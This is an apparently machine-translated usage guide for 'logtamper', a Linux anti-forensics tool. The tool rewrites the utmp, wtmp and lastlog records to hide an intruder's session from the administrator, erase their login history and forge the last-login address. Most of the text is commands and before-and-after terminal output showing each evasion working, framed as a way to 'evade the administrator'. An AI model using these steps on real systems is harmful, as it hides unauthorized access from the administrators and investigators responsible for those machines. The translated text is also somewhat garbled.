Logtamper version1.1 logtamper is a *modified *linux log tool, which can save the time information of the modified file while modifying the log file (atime has not changed, it is not necessary). [root@localhost logtamper]# ./logtamper-static Logtamper v 1.1 for linux logtamper [-f utmp_filename] -h username hostname hide username connected from hostname logtamper [-f wtmp_filename] -w username hostname erase username from hostname in wtmp file logtamper [-f lastlog_filename] -m username hostname ttyname YYYY[:MM[:DD[:hh[:mm[:ss]]]]] modify lastlog info -f option: used to specify the path of the file to be modified, is a Optional. Since the log storage paths of different systems are different, you can specify them manually. The default log location is: #define UTMPFILE "/var/run/utmp" #define WTMPFILE "/var/log/wtmp" #define LASTLOGFILE "/var/log/lastlog" -h Options: Sometimes you At the same time as the administrator, the administrator can see you. Use the -h option to evade the administrator w to view as follows: [root@localhost logtamper]# w 21:27:25 up 5 days, 13:48, 4 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty1 - Fri14 18:24m 0.33s 0.33s -bash root pts/3 192.168.80.1 21:21 6:22 0.04s 0.04s -bash root pts/2 192.168.80.1 21:06 0.00s 0.13s 0.00sw root pts/4 192.168.80.1 21:21 5:52 0.03s 0.03s -bash We are connected from the 192.168.80.1 machine, now hidden: [root@localhost logtamper]# ./logtamper-static -h Root 192.168.80.1 Logtamper v 1.1 for linux Copyright (C) 2008 by xi4oyu <
[email protected] > Seems you're invisible Now...Check it out! [root@localhost logtamper]# w 21: 27:46 up 5 days, 13:48, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty1 - Fri14 18:24m 0.33s 0.33s -bash [root@localhost logtamper]# -w option: used to clear your login log. The linux log removal tool is now very rough. This can be used to clear certain hosts from the hostname. [root@localhost logtamper]# last root tty1 Wed Oct 1 21:30 - 21:30 (00:00) root pts/4 192.168.80.1 Wed Oct 1 21:21 still logged in root pts/3 192.168.80.1 Wed Oct 1 21:21 still logged in wtmp begins Wed Oct 1 06:01:46 2008 Clear the login log for 192.168.80.1: [root@localhost logtamper]# ./logtamper-static -w root 192.168.80.1 Logtamper v 1.1 for linux Copyright (C) 2008 by xi4oyu <
[email protected] > Aho,you are now invisible to last...Check it out! [root@localhost logtamper]# last root tty1 Wed Oct 1 21:30 - 21 :30 (00:00) wtmp begins Wed Oct 1 06:01:46 2008 [root@localhost logtamper]# -m option: used to modify the last login location, we may notice this when logging in with ssh As: root Sent username "root"
[email protected] 's password: Last login: Wed Oct 1 21:31:40 2008 from 192.168.80.45 [root@localhost ~]# If not repaired lastlog, administrators will be prompted to log in next time you log from our machines IP. You can edit this option with the -m option: [root@localhost logtamper]# ./logtamper-static -m root 1.2.3.4 tty10 2008:1:1:1:1:1 Logtamper v 1.1 for linux Copyright (C) 2008 by Xihoyu <
[email protected] > Aho, now you never come here before...Check it out! [root@localhost logtamper]#